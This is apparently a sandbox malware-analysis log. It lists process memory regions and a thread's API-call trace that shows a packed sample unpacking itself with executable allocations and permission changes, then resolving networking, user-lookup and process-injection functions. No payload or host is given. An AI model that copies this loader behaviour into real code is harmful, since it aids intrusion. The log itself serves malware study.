	        filename = ""

Region:
	              id = 1636
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1637
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1638
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1639
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1640
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1641
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1642
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1643
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1644
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1645
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1646
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1647
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1648
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1649
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1650
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1651
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1652
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1653
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1654
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1655
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1656
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1657
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1658
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1659
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1660
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1661
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1662
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1663
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1664
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1665
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1666
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1667
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1668
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1669
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1670
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1671
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1672
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1673
	        start_va = 0x70190000
	          end_va = 0x701b7fff
	     entry_point = 0x70190000
	     region_type = mapped_file
	            name = "ntmarta.dll"
	        filename = "\\Windows\\SysWOW64\\ntmarta.dll" (normalized: "c:\\windows\\syswow64\\ntmarta.dll")

Region:
	              id = 1674
	        start_va = 0x6fee0000
	          end_va = 0x6ff50fff
	     entry_point = 0x6fee0000
	     region_type = mapped_file
	            name = "efswrt.dll"
	        filename = "\\Windows\\SysWOW64\\efswrt.dll" (normalized: "c:\\windows\\syswow64\\efswrt.dll")

Region:
	              id = 1675
	        start_va = 0x74260000
	          end_va = 0x74327fff
	     entry_point = 0x74260000
	     region_type = mapped_file
	            name = "wintypes.dll"
	        filename = "\\Windows\\SysWOW64\\WinTypes.dll" (normalized: "c:\\windows\\syswow64\\wintypes.dll")

Region:
	              id = 1676
	        start_va = 0x6fe90000
	          end_va = 0x6fed8fff
	     entry_point = 0x6fe90000
	     region_type = mapped_file
	            name = "edputil.dll"
	        filename = "\\Windows\\SysWOW64\\edputil.dll" (normalized: "c:\\windows\\syswow64\\edputil.dll")

Region:
	              id = 1692
	        start_va = 0x70b10000
	          end_va = 0x70b84fff
	     entry_point = 0x70b10000
	     region_type = mapped_file
	            name = "uxtheme.dll"
	        filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll")

Region:
	              id = 1693
	        start_va = 0x2740000
	          end_va = 0x285ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000002740000"
	        filename = ""

Region:
	              id = 1728
	        start_va = 0x7d0000
	          end_va = 0x7d0fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1729
	        start_va = 0x2740000
	          end_va = 0x277ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000002740000"
	        filename = ""

Region:
	              id = 1730
	        start_va = 0x2850000
	          end_va = 0x285ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000002850000"
	        filename = ""

Region:
	              id = 1731
	        start_va = 0x2860000
	          end_va = 0x295ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000002860000"
	        filename = ""

Region:
	              id = 1732
	        start_va = 0x72620000
	          end_va = 0x7276afff
	     entry_point = 0x72620000
	     region_type = mapped_file
	            name = "propsys.dll"
	        filename = "\\Windows\\SysWOW64\\propsys.dll" (normalized: "c:\\windows\\syswow64\\propsys.dll")

Region:
	              id = 1733
	        start_va = 0x2180000
	          end_va = 0x2180fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000002180000"
	        filename = ""

Region:
	              id = 1734
	        start_va = 0x77310000
	          end_va = 0x77393fff
	     entry_point = 0x77310000
	     region_type = mapped_file
	            name = "clbcatq.dll"
	        filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll")

Region:
	              id = 1774
	        start_va = 0x2190000
	          end_va = 0x2190fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000002190000"
	        filename = ""

Region:
	              id = 1775
	        start_va = 0x21a0000
	          end_va = 0x21a3fff
	     entry_point = 0x21a0000
	     region_type = mapped_file
	            name = "cversions.2.db"
	        filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db")

Region:
	              id = 1776
	        start_va = 0x2780000
	          end_va = 0x27c4fff
	     entry_point = 0x2780000
	     region_type = mapped_file
	            name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000005.db"
	        filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000005.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000005.db")

Region:
	              id = 1777
	        start_va = 0x27d0000
	          end_va = 0x27d3fff
	     entry_point = 0x27d0000
	     region_type = mapped_file
	            name = "cversions.2.db"
	        filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db")

Region:
	              id = 1778
	        start_va = 0x27e0000
	          end_va = 0x27e1fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000027e0000"
	        filename = ""

Region:
	              id = 1779
	        start_va = 0x27f0000
	          end_va = 0x27f0fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000027f0000"
	        filename = ""

Region:
	              id = 1780
	        start_va = 0x2810000
	          end_va = 0x2823fff
	     entry_point = 0x2810000
	     region_type = mapped_file
	            name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000027.db"
	        filename = "\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000027.db" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000027.db")

Region:
	              id = 1781
	        start_va = 0x2830000
	          end_va = 0x2830fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000002830000"
	        filename = ""

Region:
	              id = 1782
	        start_va = 0x2960000
	          end_va = 0x29edfff
	     entry_point = 0x2960000
	     region_type = mapped_file
	            name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db"
	        filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db")

Region:
	              id = 1783
	        start_va = 0x29f0000
	          end_va = 0x2deafff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000029f0000"
	        filename = ""

Region:
	              id = 1784
	        start_va = 0x2df0000
	          end_va = 0x2e2ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000002df0000"
	        filename = ""

Region:
	              id = 1785
	        start_va = 0x2e30000
	          end_va = 0x2f2ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000002e30000"
	        filename = ""

Region:
	              id = 1786
	        start_va = 0x2f30000
	          end_va = 0x2f6ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000002f30000"
	        filename = ""

Region:
	              id = 1787
	        start_va = 0x2f70000
	          end_va = 0x306ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000002f70000"
	        filename = ""

Region:
	              id = 1788
	        start_va = 0x3070000
	          end_va = 0x30affff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000003070000"
	        filename = ""

Region:
	              id = 1789
	        start_va = 0x30b0000
	          end_va = 0x31affff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000030b0000"
	        filename = ""

Region:
	              id = 1790
	        start_va = 0x31b0000
	          end_va = 0x31effff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000031b0000"
	        filename = ""

Region:
	              id = 1791
	        start_va = 0x31f0000
	          end_va = 0x32effff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000031f0000"
	        filename = ""

Region:
	              id = 1792
	        start_va = 0x32f0000
	          end_va = 0x332ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000032f0000"
	        filename = ""

Region:
	              id = 1793
	        start_va = 0x3330000
	          end_va = 0x342ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000003330000"
	        filename = ""

Region:
	              id = 1794
	        start_va = 0x704c0000
	          end_va = 0x7063dfff
	     entry_point = 0x704c0000
	     region_type = mapped_file
	            name = "urlmon.dll"
	        filename = "\\Windows\\SysWOW64\\urlmon.dll" (normalized: "c:\\windows\\syswow64\\urlmon.dll")

Region:
	              id = 1795
	        start_va = 0x721f0000
	          end_va = 0x724bafff
	     entry_point = 0x721f0000
	     region_type = mapped_file
	            name = "iertutil.dll"
	        filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll")

Region:
	              id = 1796
	        start_va = 0x2800000
	          end_va = 0x2800fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000002800000"
	        filename = ""

Region:
	              id = 1797
	        start_va = 0x70010000
	          end_va = 0x7001bfff
	     entry_point = 0x70010000
	     region_type = mapped_file
	            name = "pcacli.dll"
	        filename = "\\Windows\\SysWOW64\\pcacli.dll" (normalized: "c:\\windows\\syswow64\\pcacli.dll")

Region:
	              id = 1798
	        start_va = 0x2840000
	          end_va = 0x2840fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000002840000"
	        filename = ""


Thread:
	id = 80
	os_tid = 0xe68

	[0085.828] GetEnvironmentVariableW (in: lpName="a杤畷獧汧晱摩湫p", lpBuffer=0x407c7d, nSize=0xb | out: lpBuffer="p") returned 0x0
	[0085.828] OpenSemaphoreW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="") returned 0x0
	[0085.828] GetModuleHandleA (lpModuleName="eappcfg.dll") returned 0x6ffa0000
	[0085.828] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x6ffa003c, lpBuffer=0x407ab4, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x407ab4*, lpNumberOfBytesRead=0x0) returned 1
	[0085.828] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x6ffa01a0, lpBuffer=0x407ab4, nSize=0xc, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x407ab4*, lpNumberOfBytesRead=0x0) returned 1
	[0085.829] SetErrorMode (uMode=0x0) returned 0x2
	[0085.829] VirtualAllocEx (hProcess=0xffffffff, lpAddress=0x0, dwSize=0x688, flAllocationType=0x1000, flProtect=0x40) returned 0x7b0000
	[0085.829] GetModuleHandleA (lpModuleName="Kernel32.dll") returned 0x765a0000
	[0085.897] GetProcAddress (hModule=0x765a0000, lpProcName="HeapAlloc") returned 0x77992bd0
	[0085.897] GetProcAddress (hModule=0x765a0000, lpProcName="HeapFree") returned 0x765b1ba0
	[0085.898] GetProcAddress (hModule=0x765a0000, lpProcName="GetTickCount") returned 0x765c5eb0
	[0085.898] VirtualAlloc (lpAddress=0x0, dwSize=0x688, flAllocationType=0x1000, flProtect=0x40) returned 0x7c0000
	[0085.898] VirtualAlloc (lpAddress=0x0, dwSize=0x32e00, flAllocationType=0x1000, flProtect=0x4) returned 0x2000000
	[0085.906] VirtualProtect (in: lpAddress=0x400000, dwSize=0x400, flNewProtect=0x4, lpflOldProtect=0x19ff08 | out: lpflOldProtect=0x19ff08*=0x2) returned 1
	[0085.906] VirtualProtect (in: lpAddress=0x400000, dwSize=0x400, flNewProtect=0x2, lpflOldProtect=0x19ff08 | out: lpflOldProtect=0x19ff08*=0x4) returned 1
	[0085.906] VirtualProtect (in: lpAddress=0x401000, dwSize=0x22000, flNewProtect=0x4, lpflOldProtect=0x19fee8 | out: lpflOldProtect=0x19fee8*=0x80) returned 1
	[0085.922] VirtualProtect (in: lpAddress=0x401000, dwSize=0x22000, flNewProtect=0x20, lpflOldProtect=0x19fee8 | out: lpflOldProtect=0x19fee8*=0x4) returned 1
	[0085.922] VirtualProtect (in: lpAddress=0x423000, dwSize=0x2000, flNewProtect=0x4, lpflOldProtect=0x19fee8 | out: lpflOldProtect=0x19fee8*=0x8) returned 1
	[0085.922] VirtualProtect (in: lpAddress=0x423000, dwSize=0x2000, flNewProtect=0x2, lpflOldProtect=0x19fee8 | out: lpflOldProtect=0x19fee8*=0x4) returned 1
	[0085.922] VirtualProtect (in: lpAddress=0x425000, dwSize=0x11000, flNewProtect=0x4, lpflOldProtect=0x19fee8 | out: lpflOldProtect=0x19fee8*=0x8) returned 1
	[0085.924] VirtualProtect (in: lpAddress=0x425000, dwSize=0x11000, flNewProtect=0x4, lpflOldProtect=0x19fee8 | out: lpflOldProtect=0x19fee8*=0x4) returned 1
	[0085.924] VirtualProtect (in: lpAddress=0x436000, dwSize=0x1000, flNewProtect=0x4, lpflOldProtect=0x19fee8 | out: lpflOldProtect=0x19fee8*=0x8) returned 1
	[0085.925] VirtualProtect (in: lpAddress=0x436000, dwSize=0x1000, flNewProtect=0x2, lpflOldProtect=0x19fee8 | out: lpflOldProtect=0x19fee8*=0x4) returned 1
	[0085.925] VirtualProtect (in: lpAddress=0x437000, dwSize=0x1000, flNewProtect=0x4, lpflOldProtect=0x19fee8 | out: lpflOldProtect=0x19fee8*=0x8) returned 1
	[0085.925] VirtualProtect (in: lpAddress=0x437000, dwSize=0x1000, flNewProtect=0x2, lpflOldProtect=0x19fee8 | out: lpflOldProtect=0x19fee8*=0x4) returned 1
	[0085.925] GetModuleHandleA (lpModuleName="WININET.dll") returned 0x0
	[0085.925] LoadLibraryA (lpLibFileName="WININET.dll") returned 0x702b0000
	[0085.928] VirtualProtect (in: lpAddress=0x423318, dwSize=0x30, flNewProtect=0x4, lpflOldProtect=0x19fedc | out: lpflOldProtect=0x19fedc*=0x2) returned 1
	[0085.928] GetProcAddress (hModule=0x702b0000, lpProcName="HttpQueryInfoA") returned 0x70351880
	[0085.929] GetProcAddress (hModule=0x702b0000, lpProcName="InternetQueryOptionA") returned 0x70357d00
	[0085.929] GetProcAddress (hModule=0x702b0000, lpProcName="InternetSetOptionA") returned 0x70351dc0
	[0085.929] GetProcAddress (hModule=0x702b0000, lpProcName="HttpAddRequestHeadersA") returned 0x7032c3f0
	[0085.929] GetProcAddress (hModule=0x702b0000, lpProcName="InternetCloseHandle") returned 0x7037d200
	[0085.929] GetProcAddress (hModule=0x702b0000, lpProcName="HttpSendRequestA") returned 0x70378e60
	[0085.929] GetProcAddress (hModule=0x702b0000, lpProcName="InternetConnectA") returned 0x703f0da0
	[0085.929] GetProcAddress (hModule=0x702b0000, lpProcName="InternetReadFile") returned 0x70337320
	[0085.929] GetProcAddress (hModule=0x702b0000, lpProcName="HttpAddRequestHeadersW") returned 0x7032bec0
	[0085.929] GetProcAddress (hModule=0x702b0000, lpProcName="InternetOpenW") returned 0x70378490
	[0085.930] GetProcAddress (hModule=0x702b0000, lpProcName="HttpOpenRequestW") returned 0x70330fd0
	[0085.930] VirtualProtect (in: lpAddress=0x423318, dwSize=0x30, flNewProtect=0x2, lpflOldProtect=0x19fee4 | out: lpflOldProtect=0x19fee4*=0x4) returned 1
	[0085.930] GetModuleHandleA (lpModuleName="SHLWAPI.dll") returned 0x74b20000
	[0085.930] VirtualProtect (in: lpAddress=0x423284, dwSize=0x2c, flNewProtect=0x4, lpflOldProtect=0x19fedc | out: lpflOldProtect=0x19fedc*=0x2) returned 1
	[0085.930] GetProcAddress (hModule=0x74b20000, lpProcName="PathFindFileNameW") returned 0x74b37a50
	[0085.930] GetProcAddress (hModule=0x74b20000, lpProcName="StrCatW") returned 0x74b484a0
	[0085.930] GetProcAddress (hModule=0x74b20000, lpProcName="StrCpyW") returned 0x74b484e0
	[0085.930] GetProcAddress (hModule=0x74b20000, lpProcName="StrCmpIW") returned 0x74b34750
	[0085.930] GetProcAddress (hModule=0x74b20000, lpProcName="StrCpyNW") returned 0x74b433f0
	[0085.930] GetProcAddress (hModule=0x74b20000, lpProcName="StrStrA") returned 0x74b43570
	[0085.930] GetProcAddress (hModule=0x74b20000, lpProcName="StrDupW") returned 0x74b39060
	[0085.931] GetProcAddress (hModule=0x74b20000, lpProcName="StrStrIW") returned 0x74b381b0
	[0085.931] GetProcAddress (hModule=0x74b20000, lpProcName="StrRChrW") returned 0x74b3d1c0
	[0085.931] GetProcAddress (hModule=0x74b20000, lpProcName="StrCmpW") returned 0x74b35fe0
	[0085.931] VirtualProtect (in: lpAddress=0x423284, dwSize=0x2c, flNewProtect=0x2, lpflOldProtect=0x19fee4 | out: lpflOldProtect=0x19fee4*=0x4) returned 1
	[0085.931] GetModuleHandleA (lpModuleName="PSAPI.DLL") returned 0x0
	[0085.931] LoadLibraryA (lpLibFileName="PSAPI.DLL") returned 0x772c0000
	[0085.983] VirtualProtect (in: lpAddress=0x42326c, dwSize=0x8, flNewProtect=0x4, lpflOldProtect=0x19fedc | out: lpflOldProtect=0x19fedc*=0x2) returned 1
	[0085.983] GetProcAddress (hModule=0x772c0000, lpProcName="GetProcessImageFileNameA") returned 0x772c16a0
	[0085.983] VirtualProtect (in: lpAddress=0x42326c, dwSize=0x8, flNewProtect=0x2, lpflOldProtect=0x19fee4 | out: lpflOldProtect=0x19fee4*=0x4) returned 1
	[0085.983] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77960000
	[0085.983] VirtualProtect (in: lpAddress=0x423368, dwSize=0x14, flNewProtect=0x4, lpflOldProtect=0x19fedc | out: lpflOldProtect=0x19fedc*=0x2) returned 1
	[0085.983] GetProcAddress (hModule=0x77960000, lpProcName="_chkstk") returned 0x779da570
	[0085.984] GetProcAddress (hModule=0x77960000, lpProcName="RtlAllocateHeap") returned 0x77992bd0
	[0085.984] GetProcAddress (hModule=0x77960000, lpProcName="RtlFreeHeap") returned 0x77990230
	[0085.984] GetProcAddress (hModule=0x77960000, lpProcName="memset") returned 0x779dcfe0
	[0085.984] VirtualProtect (in: lpAddress=0x423368, dwSize=0x14, flNewProtect=0x2, lpflOldProtect=0x19fee4 | out: lpflOldProtect=0x19fee4*=0x4) returned 1
	[0085.984] GetModuleHandleA (lpModuleName="USERENV.dll") returned 0x0
	[0085.984] LoadLibraryA (lpLibFileName="USERENV.dll") returned 0x701e0000
	[0085.986] VirtualProtect (in: lpAddress=0x4232d8, dwSize=0x10, flNewProtect=0x4, lpflOldProtect=0x19fedc | out: lpflOldProtect=0x19fedc*=0x2) returned 1
	[0085.986] GetProcAddress (hModule=0x701e0000, lpProcName="CreateEnvironmentBlock") returned 0x701e4480
	[0085.986] GetProcAddress (hModule=0x701e0000, lpProcName="GetProfilesDirectoryW") returned 0x701e45a0
	[0085.986] GetProcAddress (hModule=0x701e0000, lpProcName="DestroyEnvironmentBlock") returned 0x701e4510
	[0085.986] VirtualProtect (in: lpAddress=0x4232d8, dwSize=0x10, flNewProtect=0x2, lpflOldProtect=0x19fee4 | out: lpflOldProtect=0x19fee4*=0x4) returned 1
	[0085.986] GetModuleHandleA (lpModuleName="WS2_32.dll") returned 0x746c0000
	[0085.986] VirtualProtect (in: lpAddress=0x423348, dwSize=0x20, flNewProtect=0x4, lpflOldProtect=0x19fedc | out: lpflOldProtect=0x19fedc*=0x2) returned 1
	[0085.986] GetProcAddress (hModule=0x746c0000, lpProcName=0x34) returned 0x746f1110
	[0085.986] GetProcAddress (hModule=0x746c0000, lpProcName=0x2) returned 0x746d3230
	[0085.987] GetProcAddress (hModule=0x746c0000, lpProcName=0x3) returned 0x746cead0
	[0085.987] GetProcAddress (hModule=0x746c0000, lpProcName=0xb) returned 0x746c5240
	[0085.987] GetProcAddress (hModule=0x746c0000, lpProcName=0x17) returned 0x746ce6b0
	[0085.987] GetProcAddress (hModule=0x746c0000, lpProcName=0xf) returned 0x746c4a90
	[0085.987] GetProcAddress (hModule=0x746c0000, lpProcName=0x73) returned 0x746c6520
	[0085.987] VirtualProtect (in: lpAddress=0x423348, dwSize=0x20, flNewProtect=0x2, lpflOldProtect=0x19fee4 | out: lpflOldProtect=0x19fee4*=0x4) returned 1
	[0085.987] GetModuleHandleA (lpModuleName="WINHTTP.dll") returned 0x0
	[0085.987] LoadLibraryA (lpLibFileName="WINHTTP.dll") returned 0x70210000
	[0085.989] VirtualProtect (in: lpAddress=0x4232e8, dwSize=0x30, flNewProtect=0x4, lpflOldProtect=0x19fedc | out: lpflOldProtect=0x19fedc*=0x2) returned 1
	[0085.989] GetProcAddress (hModule=0x70210000, lpProcName="WinHttpQueryDataAvailable") returned 0x702347a0
	[0085.989] GetProcAddress (hModule=0x70210000, lpProcName="WinHttpReceiveResponse") returned 0x7021c8e0
	[0085.989] GetProcAddress (hModule=0x70210000, lpProcName="WinHttpOpen") returned 0x70246720
	[0085.989] GetProcAddress (hModule=0x70210000, lpProcName="WinHttpAddRequestHeaders") returned 0x70229400
	[0085.989] GetProcAddress (hModule=0x70210000, lpProcName="WinHttpQueryHeaders") returned 0x702309c0
	[0085.990] GetProcAddress (hModule=0x70210000, lpProcName="WinHttpReadData") returned 0x70234ea0
	[0085.990] GetProcAddress (hModule=0x70210000, lpProcName="WinHttpOpenRequest") returned 0x70248dd0
	[0085.990] GetProcAddress (hModule=0x70210000, lpProcName="WinHttpSetOption") returned 0x702306f0
	[0085.990] GetProcAddress (hModule=0x70210000, lpProcName="WinHttpCloseHandle") returned 0x70233ad0
	[0085.990] GetProcAddress (hModule=0x70210000, lpProcName="WinHttpSendRequest") returned 0x7023bfd0
	[0085.990] GetProcAddress (hModule=0x70210000, lpProcName="WinHttpConnect") returned 0x70242880
	[0085.990] VirtualProtect (in: lpAddress=0x4232e8, dwSize=0x30, flNewProtect=0x2, lpflOldProtect=0x19fee4 | out: lpflOldProtect=0x19fee4*=0x4) returned 1
	[0085.990] GetModuleHandleA (lpModuleName="NETAPI32.dll") returned 0x0
	[0085.990] LoadLibraryA (lpLibFileName="NETAPI32.dll") returned 0x77490000
	[0085.998] VirtualProtect (in: lpAddress=0x423260, dwSize=0xc, flNewProtect=0x4, lpflOldProtect=0x19fedc | out: lpflOldProtect=0x19fedc*=0x2) returned 1
	[0085.998] GetProcAddress (hModule=0x77490000, lpProcName="NetApiBufferFree") returned 0x6ff916d0
	[0085.998] GetProcAddress (hModule=0x77490000, lpProcName="NetUserGetInfo") returned 0x6ff733a0
	[0085.999] VirtualProtect (in: lpAddress=0x423260, dwSize=0xc, flNewProtect=0x2, lpflOldProtect=0x19fee4 | out: lpflOldProtect=0x19fee4*=0x4) returned 1
	[0086.000] GetModuleHandleA (lpModuleName="KERNEL32.dll") returned 0x765a0000
	[0086.000] VirtualProtect (in: lpAddress=0x4230c8, dwSize=0x198, flNewProtect=0x4, lpflOldProtect=0x19fedc | out: lpflOldProtect=0x19fedc*=0x2) returned 1
	[0086.000] GetProcAddress (hModule=0x765a0000, lpProcName="VirtualProtectEx") returned 0x765e2790
	[0086.000] GetProcAddress (hModule=0x765a0000, lpProcName="VirtualAllocEx") returned 0x765e2730
